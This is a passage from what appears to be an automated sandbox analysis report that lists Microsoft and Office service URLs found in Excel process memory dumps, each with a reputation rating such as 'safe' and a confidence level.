                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000000.00000002.583502089.000000000DDE0000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                  		high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpfalse
                                    		high
                                    https://api.microsoftstream.com/api/EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                      		high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                        		high
                                        https://cr.office.comEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                          		high
                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechQEXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpfalse
                                            		high
                                            https://res.getmicrosoftkey.com/api/redemptionevents01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://tasks.office.com01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                              		high
                                              https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://login.windows.net/common/oauth2/authorizemIeEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                		high
                                                https://outlook.office365.com/api/v1.0/me/Activities=DUEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://login.windows.net/common/oauth2/authorize%EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://login.windows.net/common/oauth2/authorize&EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                        		high
                                                        https://substrate.office.comp7hEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://login.windows.net/common/oauth2/authorizeOQEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://substrate.office.comlEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.odwebp.svc.msEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                            		high
                                                            https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                              		high
                                                              https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://login.windows.net/common/oauth2/authorizeOIEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://graph.windows.netEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                  		high
                                                                  https://substrate.office.com%6EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                    		high
                                                                    https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                      		high
                                                                      http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                        		high
                                                                        https://substrate.office.comPEXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                          		high
                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                            		high
                                                                            https://login.windows.net/common/oauth2/authorizeaEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://login.windows.net/common/oauth2/authorizebEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workJEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://onedrive.live.comedEXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://clients.config.office.net/user/v1.0/ios01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
                                                                                      		high
                                                                                      https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drfalse
